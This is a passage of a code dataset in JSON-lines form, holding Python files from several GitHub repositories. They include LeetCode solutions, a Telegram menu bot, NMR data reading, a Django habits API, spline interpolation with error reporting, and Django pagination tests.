self.stack1.append(self.stack2.pop())\r\n\r\n self.size += 1\r\n\r\n def deleteHead(self) -> int:\r\n if self.size <= 0:\r\n return -1\r\n\r\n self.size -= 1\r\n return self.stack1.pop()\r\n\r\n\r\n# Your CQueue object will be instantiated and called as such:\r\n# obj = CQueue()\r\n# obj.appendTail(value)\r\n# param_2 = obj.deleteHead()","repo_name":"lost-person/Leetcode","sub_path":"面试题09.利用两个栈实现队列.py","file_name":"面试题09.利用两个栈实现队列.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38808961156","text":"\"\"\"\nCreated on Mar 30, 2011\n\n@author: guillaume\n\"\"\"\n\nimport os\n\nimport scipy as sc\n\nfrom chemex import utils\n\n\ndef read_data(cfg, working_dir, global_parameters, res_incl=None, res_excl=None):\n \"\"\"Read the shifts\"\"\"\n\n # Reads the path to get the shifts\n exp_data_dir = utils.normalize_path(working_dir,\n cfg.get('path', 'exp_data_dir'))\n\n data_points = list()\n\n experiment_name = name_experiment(global_parameters)\n\n for key, val in cfg.items('data'):\n\n if 'file' not in key:\n continue\n\n parameters = dict(global_parameters)\n\n parameters['experiment_name'] = experiment_name\n\n abs_path_filename = os.path.join(exp_data_dir, val)\n data_points += read_a_shift_file(abs_path_filename, parameters, res_incl, res_excl)\n\n return data_points\n\n\ndef name_experiment(global_parameters=None):\n if global_parameters is None:\n global_parameters = dict()\n\n if 'experiment_name' in global_parameters:\n name = global_parameters['experiment_name'].strip().replace(' ', '_')\n else:\n exp_type = global_parameters['experiment_type']\n h_larmor_frq = float(global_parameters['h_larmor_frq'])\n temperature = float(global_parameters['temperature'])\n\n name = '{:s}_{:.0f}MHz_{:.0f}C'.format(exp_type, h_larmor_frq, temperature).lower()\n\n return name\n\n\ndef read_a_shift_file(filename, parameters, res_incl=None, res_excl=None):\n \"\"\"Reads in the fuda file and spit out the intensities\"\"\"\n\n data = sc.loadtxt(filename, dtype=[('resonance_id', 'S10'), ('shift_ppb', 'f8'), ('shift_ppb_err', 'f8')])\n\n data_points = list()\n\n exp_type = parameters['experiment_type'].replace('_shift', '')\n data_point = __import__(exp_type + '.data_point', globals(), locals(), ['DataPoint'], -1)\n\n for resonance_id, shift_ppb, shift_ppb_err in data:\n\n included = (\n (res_incl is not None and resonance_id in res_incl) or\n (res_excl is not None and resonance_id not in res_excl) or\n (res_incl is None and 
res_excl is None)\n )\n\n if not included:\n continue\n\n parameters['resonance_id'] = resonance_id\n\n data_points.append(data_point.DataPoint(shift_ppb, shift_ppb_err, parameters))\n\n return data_points\n","repo_name":"marcuscangussu/chemex_bouvignies","sub_path":"chemex/experiments/shift/reading.py","file_name":"reading.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34901644877","text":"import telebot\nfrom decouple import config\nfrom telebot import types\n\nbot = telebot.TeleBot(config(\"TOKEN_BOT\"))\n\n\n@bot.message_handler(commands=[\"start\", \"Hello\"])\ndef get_start_message(message):\n full_name = f\"{message.from_user.last_name} {message.from_user.first_name} !!!\"\n text = f\"Welcome {full_name}\"\n bot.send_message(message.chat.id, text)\n bot.reply_to(message, text)\n\n@bot.message_handler(content_types=[\"text\"])\ndef get_message(message):\n markup = types.InlineKeyboardMarkup(row_width=2)\n if message.text.lower() == \"меню\":\n text = \"Выберите пожалуйста:\"\n button1 = types.InlineKeyboardButton(\"чай\", callback_data=\"tea\")\n #button1 = types.InlineKeyboardButton(\"чай\", url=\"https://www.google.com/search?q=tea&sxsrf=ALiCzsYn0Nu6SBiO31Bp65hNn51LrgWTIQ:1667537037440&source=lnms&tbm=isch&sa=X&ved=2ahUKEwj5uZDG25P7AhUJ_CoKHdSpCOwQ_AUoAXoECAEQAw\")\n button2 = types.InlineKeyboardButton(\"кофе\", callback_data=\"coffee\")\n markup.add(button1, button2)\n bot.send_message(message.chat.id, text, reply_markup=markup)\n\n@bot.callback_query_handler(func=lambda call: True)\ndef get_callback_data(call):\n murkup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n text = \"\"\n if call.data == \"tea\":\n text = f\"Выберите желаемый чай внизy:\"\n btn1 =types.KeyboardButton(\"black\")\n btn2 = types.KeyboardButton(\"blue\")\n btn3 = types.KeyboardButton(\"green\")\n murkup.add(btn1, btn2, btn3)\n if call.data == \"coffee\":\n text = f\"Выберите желаемый кофе внизy:\"\n btn1 = types.KeyboardButton(\"latte\")\n btn2 = types.KeyboardButton(\"cappuchino\")\n btn3 = types.KeyboardButton(\"espresso\")\n murkup.add(btn1, btn2, btn3)\n\n bot.send_message(call.message.chat.id, text, reply_markup=murkup)\n\n\n\nbot.polling()","repo_name":"temirbekovaaidana/pybot","sub_path":"start_bot.py","file_name":"start_bot.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37624486997","text":"from django.conf.urls import patterns, url\n\nfrom peni import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.home, name='index'),\n\turl(r'search/$', views.search, name='search'),\n\turl(r'scan/$', views.bug_scan, name='scan'),\n\turl(r'sql/$', views.sql_injection, name='sql'),\n\turl(r'sql/getdb/$', views.sql_getdb, name='sqldb'),\n\turl(r'sql/getable/$', views.sql_getable, name='sqltable'),\n\turl(r'sql/getfiles/$', views.sql_getfiles, name='sqlfiles'),\n\turl(r'bug/$', views.bug_detail, name='bug'),\n\turl(r'bug/find/$', views.search_bug, name='bugsearch'),\n\turl(r'bug/getdetail/$', views.find_bug_detail, name='bugdetail'),\n\turl(r'pwd/$', views.pwd_crack, name='pwdcrack'),\n\turl(r'pwd/crack/$', views.pwd_get, name='pwdget'),\n\turl(r'pwd/md5/$', views.md5_crack, 
name='md5'),\n)","repo_name":"gitferry/webtest","sub_path":"peni/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3829164262","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 9 22:53:33 2018\n\n@author: owo\n\n做完 HW05_allforone.py\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt \n\nS_event = './{0}_data/{0}'.format('New_GPS_day2_out')\n\nAy_atmo_llh = np.load('{0}_atmsfree_llh_all.npy'.format(S_event))\nAy_atmo_xyz = np.load('{0}_atmsfree_xyz_all.npy'.format(S_event))\nAy_atmo_enu = np.load('{0}_atmsfree_enu_all.npy'.format(S_event))\nAy_atmo_sate_num = np.load('{0}_atmsfree_sate_num.npy'.format(S_event))\nAy_atmo_time = np.load('{0}_atmsfree_time.npy'.format(S_event))\nAy_atmo_DOP = np.load('{0}_atmsfree_DOP.npy'.format(S_event))\n\nplt.plot(Ay_atmo_time+24,Ay_atmo_sate_num)\nplt.xlabel('LT')\nplt.ylabel('num')\nplt.title('num of satelite')\nplt.savefig('{0}_notatmsfree_satenum.png'.format(S_event))\nplt.clf()\n\natmo_DOP = plt.plot(Ay_atmo_time,Ay_atmo_DOP[0,:],label='PDOP')\natmo_DOP = plt.plot(Ay_atmo_time,Ay_atmo_DOP[1,:],label='TDOP')\natmo_DOP = plt.plot(Ay_atmo_time,Ay_atmo_DOP[2,:],label='GDOP')\nplt.legend()\nplt.xlabel('LT')\nplt.ylabel('m')\nplt.title('atms-free_DOP')\n\nplt.savefig('{0}_DOP.png'.format(S_event))\nplt.clf()\n\nwith open('{0}_atmofree_llh_googleearth.txt'.format(S_event),'w') as f:\n for i in range(len(Ay_atmo_llh)):\n f.write(\"{0},{1},{2}\\n\".format(Ay_atmo_llh[i,1],Ay_atmo_llh[i,0],Ay_atmo_llh[i,2]))","repo_name":"mfkiwl/python-GPS-test","sub_path":"python_code/現代衛星導航作業/HW06/燒錄光碟用/程式與資料/end_data_readandplt.py","file_name":"end_data_readandplt.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8331855647","text":"import h5py\nimport numpy as np\n\n\ndirName = ''\n\nmeshName = 'fieldTest.h5'\n\nf = h5py.File(dirName + meshName, 'w')\n\n# meshGrp = f.create_group('Mesh')\n\n# nodes = meshGrp.create_dataset('Nodes', (9, 2), 'f8')\n# nodes[0, 0] = 0.0\n# nodes[0, 1] = 0.0\n# nodes[1, 0] = 1.0\n# nodes[1, 1] = 0.0\n# nodes[2, 0] = 1.0\n# nodes[2, 1]= 1.0\n# nodes[3, 0] = 0.0\n# nodes[3, 1]= 1.0\n# nodes[4, 0] = 0.5\n# nodes[4, 1]= 0.5\n# nodes[5, 0] = 0.5\n# nodes[5, 1]= 0.0\n# nodes[6, 0] = 1.0\n# nodes[6, 1]= 0.5\n# nodes[7, 0] = 0.5\n# nodes[7, 1]= 1.0\n# nodes[8, 0] = 0.0\n# nodes[8, 1]= 0.5\n\n# Tri\n# cells = meshGrp.create_dataset('Cells', (8, 3), dtype='i4')\n# cells[0, :] = [0, 5, 4]\n# cells[1, :] = [5, 1, 4]\n# cells[2, :] = [1, 6, 4]\n# cells[3, :] = [6, 2, 4]\n# cells[4, :] = [2, 7, 4]\n# cells[5, :] = [7, 3, 4]\n# cells[6, :] = [3, 8, 4]\n# cells[7, :] = [8, 0, 4]\n\n# Quad\n# cells = meshGrp.create_dataset('Cells', (4, 4), dtype='i4')\n# cells[0, :] = [0, 5, 4, 8]\n# cells[1, :] = [5, 1, 6, 4]\n# cells[2, :] = [4, 6, 2, 7]\n# cells[3, :] = [8, 4, 7, 3]\n\n# Tri 2\n# cells = meshGrp.create_dataset('Cells', (2, 6), dtype='i4')\n# cells[0, :] = [0, 1, 3, 5, 4, 8]\n# cells[1, :] = [3, 1, 2, 4, 6, 7]\n\n# Quad 2\n# cells = meshGrp.create_dataset('Cells', (1, 9), 'i4')\n# cells[0, :] = [0, 1, 2, 3, 5, 6, 7, 8, 4]\n\nfieldGrp = f.create_group('FieldData')\n\nnodeField = fieldGrp.create_dataset('NodeField', (9,1,1), 'f8')\nfor i in range(9):\n nodeField[i, 0, 0] = i\nnodeField.attrs['ftype'] = 0\n\ncellField = fieldGrp.create_dataset('CellField', (8,2,1), 'f8')\nfor i in range(8):\n cellField[i, 0, 
0] = i\n    cellField[i, 1, 0] = -i\ncellField.attrs['ftype'] = 3\n\nf.close()\n","repo_name":"julienfausty/HyperFox","sub_path":"ressources/meshes/writeh5.py","file_name":"writeh5.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
{"seq_id":"22294736519","text":"from db import getItemPrice\nclass Cart:\n    def __init__(self) -> None:\n        self.shoppingCart = {}\n\n    def addItem(self, item):\n        if item not in self.shoppingCart:\n            self.shoppingCart[item]=0\n        self.shoppingCart[item]+=1\n\n    def removeItem(self, item):\n        if item in self.shoppingCart:\n            if self.shoppingCart[item] <= 0:\n                return(\"Error: Item count is 0.\")\n            self.shoppingCart[item]-=1\n            return(f\"Removed 1 {item}\")\n\n        else:\n            return(\"Error: Item not in cart.\")\n\n    #takes in cart from retrieve cart, then adds html to make the cart look nice\n    @staticmethod\n    def decorateCart(cart):\n        return_html = \"\"\n        finalTotalPrice = 0\n        for keys, value in cart.items():\n            if value > 0:\n                itemPrice = getItemPrice(keys)\n                totalPrice = round(itemPrice * value, 2)\n                return_html += f\"{keys}: {value} = ${totalPrice}\\n\"\n                finalTotalPrice += totalPrice\n        \n        return_html += \"$\" + str(round(finalTotalPrice, 2))\n        return(return_html.split('\\n'))\n    \n    @staticmethod\n    def getTotal(cart):\n        finalTotalPrice = 0\n        for keys, value in cart.items():\n            if value > 0:\n                itemPrice = getItemPrice(keys)\n                totalPrice = round(itemPrice * value, 2)\n                finalTotalPrice += totalPrice\n        \n        return(finalTotalPrice)\n\n","repo_name":"icyandrew360/GroceryStore","sub_path":"cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"10903006159","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\ndef joke():\n    T=int(input(\"\"))\n    for i in range(0,T):\n        N=int(input(\"\"))\n        l1=[\"\"]*N\n        for j in range(0,N):\n            s=input(\"\")\n            l1=list(list(map(int,str(s).split())))\n        # l1 holds the last parsed line as a flat list of ints\n        X=l1[0]\n        Y=l1[1]\n\n","repo_name":"anshumanairy/Codechef","sub_path":"Good Joke.py","file_name":"Good Joke.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
{"seq_id":"2628273039","text":"DEFAULT_URL = \"https://panorama.pub\"\n\n\ndef process(url=DEFAULT_URL, web_page_path=\"\", data_path=\"\"):\n    url = url\n    path = data_path\n\n    d = downloader(url=url, mode=\"get\")\n    d.save(web_page_path + \"panorama.html\")\n\n    p = parser()\n    if url == DEFAULT_URL:\n        r = p.parse_main_page(web_page_path + \"panorama.html\")\n        path += \"main_page.json\"\n    elif url[url.rfind('/') + 1:].replace('-', '').isdigit():\n        r = p.parse_day(web_page_path + \"panorama.html\")\n        path += \"day.json\"\n    else:\n        r = p.parse_article(web_page_path + \"panorama.html\")\n        path += \"article.json\"\n\n    p.save(path)\n    return update(r)\n\n\nif __name__ == \"__main__\":\n    from downloader import downloader\n    from parser import parser\n    from data import update\nelse:\n    from .downloader import downloader\n    from .parser import parser\n    from .data import update\n","repo_name":"incllude/PanoramaPubScraper","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"3194464062","text":"'''\nhttps://leetcode.com/problems/longest-common-prefix/\n\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf 
there is no common prefix, return an empty string \"\".\n\n\n\nExample 1:\n\nInput: strs = [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\n\nInput: strs = [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\n\n'''\n\ndef longest_common_prefix(strs):\n    if not strs:\n        return \"\"\n    short_word = min(strs, key=len)\n\n    for i, ch in enumerate(short_word):\n        for otherwords in strs:\n            if otherwords[i] != ch:\n                return short_word[:i]\n    return short_word\n\n\nstrr = [\"flower\",\"flow\",\"flight\"]\nprint(longest_common_prefix(strr))","repo_name":"kumarravindra/leetworld","sub_path":"ltc_python_topics/com/lc/easy/Longest_Common_Prefix.py","file_name":"Longest_Common_Prefix.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"16454375209","text":"from random import randint, choices, sample\r\nimport re\r\n\r\nRE_SEPARATORS = re.compile(\"[,;]\")\r\nRE_ELEMENTS = re.compile(\"(?<=(l|u).)[^$\\#]+\")\r\n\r\ndef trouver_elements_et_n_fois(cmd:str) -> tuple[list[str], int, str]:\r\n    elements = re.search(RE_ELEMENTS, cmd)\r\n    assert elements is not None, \"Invalid syntax: no elements are present\"\r\n\r\n    nombre_fois = cmd[:elements.start()-2]\r\n    assert nombre_fois.isdigit(), \"Invalid command: the number of chosen elements is invalid\"\r\n    nombre_fois = int(nombre_fois)\r\n\r\n    if \"#\" in cmd:\r\n        commentaire = cmd[cmd.index(\"#\"):]\r\n    else:\r\n        commentaire = \"\"\r\n\r\n    elements = re.split(RE_SEPARATORS, elements.group())\r\n\r\n    assert nombre_fois >= 1, \"Invalid syntax: the number of chosen elements is less than 1\"\r\n\r\n    return elements, nombre_fois, commentaire\r\n\r\ndef formater_resultat(commentaire, elements):\r\n    if type(elements) == str and not elements.startswith(\" \"):\r\n        elements = \" \" + elements\r\n    return \"Draw result: \\n{0}\\n{1}\".format(commentaire, str(elements)[1:-1])\r\n\r\ndef exec_l(cmd:str):\r\n    elements, nombre_fois, commentaire = trouver_elements_et_n_fois(cmd) \r\n    return formater_resultat(commentaire, choices(elements, k=nombre_fois))\r\n\r\ndef exec_u(cmd:str):\r\n    elements, nombre_fois, commentaire = trouver_elements_et_n_fois(cmd)\r\n    assert nombre_fois <= len(elements), \"Invalid command: the number of chosen elements exceeds the number of possible choices\"\r\n    \r\n    choix = sample(elements, nombre_fois)\r\n\r\n    return formater_resultat(commentaire, choix)\r\n","repo_name":"Otomatyk/PyDiceBot","sub_path":"dice_engine_l_et_u.py","file_name":"dice_engine_l_et_u.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
{"seq_id":"5840431630","text":"from rest_framework.permissions import BasePermission\n\nfrom posts.models import Post\n\n\nclass IsOwner(BasePermission):\n    def has_permission(self, request, view):\n        try:\n            user_profile = Post.objects.get(\n                pk=view.kwargs['pk'])\n        except (Post.DoesNotExist, Post.MultipleObjectsReturned):\n            return False\n\n        if request.user.profile == user_profile:\n            return True\n        return False\n","repo_name":"AnufriyevT/RestApiBlog","sub_path":"posts/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"853997368","text":"import cubic_spline\nimport plotting\nimport error\nimport data_generator\nimport Bspline\nfrom tabulate import 
tabulate\nimport matplotlib.pyplot as plt\nimport warnings\nimport os\nwarnings.filterwarnings(\"ignore\", message=\"elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison\")\n\nprint(\"===================================================\")\nprint(\"COSC 6364 FINAL PROJECT: SPLINE INTERPOLATION IN 3D\")\nprint(\"===================================================\")\nnumcoords = input(\"Number of Coordinates: \")\nxspace = input(\"x coordinate spacing: \")\nprint(\"Range of Y-values:\")\ny_low = input(\"Low: \")\ny_high = input(\"High: \")\nprint(\"\\n\")\n\ncoordinates = data_generator.generate_coordinates(int(numcoords), int(xspace), int(y_low), int(y_high))\n\n#coordinates = data_generator.generate_coordinates(10, 2, 1, 100)\n#print(\"Coordinates Generated: \")\n\n#print(coordinates)\n\nx = coordinates[0]\ny = coordinates[1]\nz = coordinates[2]\n\n''''\n---------------------------------------------------\nCUBIC SPLINE CALCULATIONS\n---------------------------------------------------\n'''\n\n\nxy_coefs = cubic_spline.cubic_interpolation(x,y)\nxz_coefs = cubic_spline.cubic_interpolation(x,z)\n\ndir_path = 'plots/cubic'\nif not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\nfig1 = plotting.plot_spline2D(x, y, xy_coefs)\nfig1.savefig('plots/cubic/spline2D.png')\nplt.close(fig1)\n\nfig2 = plotting.plot_spline3D(x,y,z, xy_coefs, xz_coefs)\nfig2.savefig('plots/cubic/spline3D.png')\nplt.close(fig2)\n\n\n\n'''\n---------------------------------------------------\nB-SPLINE CALCULATIONS\n---------------------------------------------------\n'''\n\nBspline_2D_results = []\nBspline_3D_results = []\n\nBspline_2D_Alt = []\nBspline_3D_Alt = []\n\ndir_path = 'plots/bspline'\nif not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\nfor degree in range(1,5):\n Bspline_2D_results.append(Bspline.Bspline_interpolate((coordinates[0],coordinates[1]), degree, 100)) #2D Calculation\n Bspline_3D_results.append(Bspline.Bspline_interpolate(coordinates, degree, 100)) #3D Calculation\n\nfor i in range(0,4):\n \n out_2D = Bspline_2D_results[i][0]\n tck_2D = Bspline_2D_results[i][1]\n Bspline_2D_Plot = (plotting.plot_2D_Bspline_WithControlPolygon(x ,y, tck_2D, out_2D))\n Bspline_2D_Plot.savefig(f'plots/bspline/Bspline_2D_Plot_Degree_{i+1}.png')\n plt.close(Bspline_2D_Plot)\n\n out_3D = Bspline_3D_results[i][0]\n tck_3D = Bspline_3D_results[i][1]\n Bspline_3D_Plots = (plotting.plot_3D_BSpline_WithControlPolygon(x ,y, z, tck_3D, out_3D))\n Bspline_3D_Plots.savefig(f'plots/bspline/Bspline_3D_Plot_Degree_{i+1}.png')\n plt.close(Bspline_3D_Plots)\n \n #Alternate Method\n Bspline_2D_Plot_Alt = plotting.plot_2D_Bspline_alternate((x,y),i+1)\n Bspline_2D_Plot_Alt.savefig(f'plots/bspline/BsplineAlt_2D_Plot_Degree_{i+1}.png')\n plt.close(Bspline_2D_Plot_Alt)\n\n Bspline_3D_Plot_Alt = plotting.plot_3D_Bspline_alternate((x,y,z),i+1)\n Bspline_3D_Plot_Alt.savefig(f'plots/bspline/BsplineAlt_3D_Plot_Degree_{i+1}.png')\n plt.close(Bspline_3D_Plot_Alt)\n\n\n''''\n---------------------------------------------------\nERROR CALCULATION AND REPORTING\n---------------------------------------------------\n'''\n\n# CUBIC SPLINE ERROR\ncub_abs_error_y, cub_rel_error_y = error.error(x, y, xy_coefs)\ncub_abs_error_z, cub_rel_error_z = error.error(x, z, xz_coefs)\ncub_abs_mag_error = error.mag_error(cub_abs_error_y, cub_abs_error_z)\ncub_rel_mag_error = error.mag_error(cub_rel_error_y, cub_rel_error_z)\n\n# B-SPLINE ERROR\n#bspline_error_2D_cubic = 
error.bspline_error(x,y,3)\n\nbspline_error_1D_quadratic = error.bspline_error2(x,y,2)\nbspline_error_1D_cubic = error.bspline_error2(x,y,3)\nbspline_error_1D_quartic = error.bspline_error2(x,y,4)\n\nbspline_error_1D_quadratic_z = error.bspline_error2(x,z,2)\nbspline_error_1D_cubic_z = error.bspline_error2(x,z,3)\nbspline_error_1D_quartic_z = error.bspline_error2(x,z,4)\n\nbs_err_2D_quad_abs = error.mag_error(bspline_error_1D_quadratic[0], bspline_error_1D_quadratic_z[0])\nbs_err_2D_cubic_abs = error.mag_error(bspline_error_1D_cubic[0], bspline_error_1D_cubic_z[0])\nbs_err_2D_quartic_abs = error.mag_error(bspline_error_1D_quartic[0], bspline_error_1D_quartic_z[0])\n\n#print(bspline_error_2D_cubic[0])\n#print(bspline_error_2D_cubic[1])\nprint(\"Cubic spline plots saved to ..\\\\plots\\\\cubic\")\nprint(\"B-Spline plots saved to ..\\\\plots\\\\bspline\")\nprint(\"\\n\")\n\ntable = [ [\"Method\", \"AVG Abs Error\", \"AVG Rel Error %\"],\n    [\"Cubic Spline 1D\", sum(cub_abs_error_y)/len(x), (sum(cub_rel_error_y)/len(x))*100],\n    [\"Cubic Spline 2D\", sum(cub_abs_mag_error)/len(x), (sum(cub_rel_mag_error)/len(x))*100],\n    [\"B-Spline 1D - Degree 2\", sum(bspline_error_1D_quadratic[0])/len(x), (sum(bspline_error_1D_quadratic[1])/len(x))*100],\n    [\"B-Spline 1D - Degree 3\", sum(bspline_error_1D_cubic[0])/len(x), (sum(bspline_error_1D_cubic[1])/len(x))*100],\n    [\"B-Spline 1D - Degree 4\", sum(bspline_error_1D_quartic[0])/len(x), (sum(bspline_error_1D_quartic[1])/len(x))*100],\n    [\"B-Spline 2D - Degree 2\", sum(bs_err_2D_quad_abs)/len(x), (sum(bs_err_2D_quad_abs)/len(x))*100],\n    [\"B-Spline 2D - Degree 3\", sum(bs_err_2D_cubic_abs)/len(x), (sum(bs_err_2D_cubic_abs)/len(x))*100],\n    [\"B-Spline 2D - Degree 4\", sum(bs_err_2D_quartic_abs)/len(x), (sum(bs_err_2D_quartic_abs)/len(x))*100]\n]\n\nprint(tabulate(table, headers=\"firstrow\"))\nprint(\"\\n\")\n\n\ndir_path = 'plots/err'\nif not os.path.exists(dir_path):\n    os.makedirs(dir_path)\n\nabsFig_y = plotting.semi_log(x, cub_abs_error_y, \"Absolute Error in Y Plane\", \"x\", \"Error\")\nabsFig_y.savefig('plots/err/absErrorY.png')\nplt.close(absFig_y)\n\nrelFig_y = plotting.semi_log(x, cub_rel_error_y, \"Relative Error in Y Plane\", \"x\", \"Error\")\nrelFig_y.savefig('plots/err/relErrorY.png')\nplt.close(relFig_y)\n\nabsFig_z = plotting.semi_log(x, cub_abs_error_z, \"Absolute Error in Z Plane\", \"x\", \"Error\")\nabsFig_z.savefig('plots/err/absErrorZ.png')\nplt.close(absFig_z)\n\nrelFig_z = plotting.semi_log(x, cub_rel_error_z, \"Relative Error in Z Plane\", \"x\", \"Error\")\nrelFig_z.savefig('plots/err/relErrorZ.png')\nplt.close(relFig_z)\n\n\n\n\n","repo_name":"sm7777/spline_interpolation","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"25975874999","text":"from rest_framework import generics\nfrom .models import HabitsModel, Title, UserHabitsModel, Tasks\nfrom .serializers import HabitsSerializer, TitleSerializer, UserHabitsSerializer, TasksSerializer\n\n\nclass TitleDetail(generics.RetrieveUpdateAPIView):\n    lookup_field = 'pk'\n    queryset = Title.objects.all()\n    serializer_class = TitleSerializer\n\ntitle_detail_view = TitleDetail.as_view()\n\nclass HabitsListCreateView(generics.ListCreateAPIView):\n    queryset = HabitsModel.objects.all()\n    serializer_class = HabitsSerializer\n\nhabits_list_create_view = HabitsListCreateView.as_view()\n\nclass 
HabitsDetailUpdateDeleteView(generics.RetrieveUpdateDestroyAPIView):\n lookup_field = 'pk'\n queryset = HabitsModel.objects.all()\n serializer_class = HabitsSerializer\n\nhabits_detail_ud = HabitsDetailUpdateDeleteView.as_view()\n\n\nclass UserHabitsListCreateView(generics.ListCreateAPIView):\n queryset = UserHabitsModel.objects.all()\n serializer_class = UserHabitsSerializer\n\nuser_habits_list_create_view = UserHabitsListCreateView.as_view()\n\nclass UserHabitsDetailUpdateDeleteView(generics.RetrieveUpdateDestroyAPIView):\n lookup_field = 'pk'\n queryset = UserHabitsModel.objects.all()\n serializer_class = UserHabitsSerializer\n\nuser_habits_detail_ud = UserHabitsDetailUpdateDeleteView.as_view()\n\nclass TaskListView(generics.ListAPIView):\n queryset = Tasks.objects.all().order_by('-pk')\n serializer_class = TasksSerializer\n\ntask_list_view = TaskListView.as_view()\n\nclass TaskDetailUpgrade(generics.RetrieveUpdateAPIView):\n lookup_field = 'pk'\n queryset = Tasks.objects.all()\n serializer_class = TasksSerializer\n\n\ntask_detail_upgrade = TaskDetailUpgrade.as_view()","repo_name":"RobTov/anavrin-backend","sub_path":"habits/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26778969119","text":"import pytest\nfrom django.contrib.auth.models import User\nfrom django.test import override_settings\nfrom django.urls import reverse\n\nfrom analytics.models import Event\nfrom analytics.views import encode_keyset, JsonbFieldIncrementer\n\nTEST_PASSWORD = \"password\"\n\n\n# tag::fixtures[]\n@pytest.fixture\ndef user():\n return User.objects.create_user(\n username=\"Mac\", password=TEST_PASSWORD)\n\n\n@pytest.fixture\ndef events(user):\n Event.objects.create(\n name=\"goal.viewed\", user=user, data={\"test\": 1})\n Event.objects.create(\n name=\"goal.clicked\", user=user, data={\"test\": 2})\n Event.objects.create(\n name=\"goal.favorited\", user=user, data={\"test\": 3})\n return Event.objects.all().order_by('pk')\n\n\n# end::fixtures[]\n\n@pytest.fixture\ndef authenticated_client(user, client):\n client.login(username=user.username, password=TEST_PASSWORD)\n return client\n\n\n@pytest.fixture\n@override_settings(DEBUG=True, EVENTS_PER_PAGE=2)\ndef page_one_generic(authenticated_client):\n url = reverse(\"events_keyset_generic\")\n return authenticated_client.get(url)\n\n\n@pytest.fixture\n@override_settings(DEBUG=True, EVENTS_PER_PAGE=2)\ndef page_one_pg(authenticated_client):\n url = reverse(\"events_keyset_pg\")\n return authenticated_client.get(url)\n\n\ndef content(page):\n return page.content.decode(\"utf-8\")\n\n\n@pytest.mark.django_db\ndef test_includes_page_one_results(events, page_one_generic):\n assert events[0].name in content(page_one_generic)\n assert events[1].name in content(page_one_generic)\n\n\n@pytest.mark.django_db\ndef test_hides_second_page_results(events, page_one_generic):\n assert events[2].name not in content(page_one_generic)\n\n\n@pytest.mark.django_db\ndef test_has_next_link(events, page_one_generic):\n last_page_one_event = events[1]\n expected_keyset = encode_keyset(last_page_one_event)\n assert expected_keyset in content(page_one_generic)\n\n\n@pytest.mark.django_db\ndef test_next_link_requests_next_page(events,page_one_generic,\n authenticated_client):\n next_keyset = page_one_generic.context['next_keyset']\n next_page_url = \"{}?keyset={}\".format(\n reverse(\"events_keyset_generic\"), next_keyset)\n page_two_event = 
events[2]\n page_two = authenticated_client.get(next_page_url)\n assert page_two_event.name in content(page_two)\n\n\n@pytest.mark.django_db\ndef test_includes_page_one_results_pg(events, page_one_pg):\n assert events[0].name in content(page_one_pg)\n assert events[1].name in content(page_one_pg)\n\n\n@pytest.mark.django_db\ndef test_hides_second_page_results_pg(events, page_one_pg):\n assert events[2].name not in content(page_one_pg)\n\n\n@pytest.mark.django_db\ndef test_has_next_link_pg(events, page_one_pg):\n last_page_one_event = events[1]\n expected_keyset = encode_keyset(last_page_one_event)\n assert expected_keyset in content(page_one_pg)\n\n\n@pytest.mark.django_db\ndef test_next_link_requests_next_page_pg(events, page_one_pg,\n authenticated_client):\n next_keyset = page_one_pg.context['next_keyset']\n next_page_url = \"{}?keyset={}\".format(\n reverse(\"events_keyset_pg\"), next_keyset)\n page_two_event = events[2]\n page_two = authenticated_client.get(next_page_url)\n assert page_two_event.name in content(page_two)\n\n\n# tag::testing_jsonb_incrementer[]\n@pytest.mark.django_db\ndef test_json_incrementer_sets_missing_count(events):\n assert all(['count' not in e.data for e in events])\n incr_by_one = JsonbFieldIncrementer('data', 'count', 1)\n 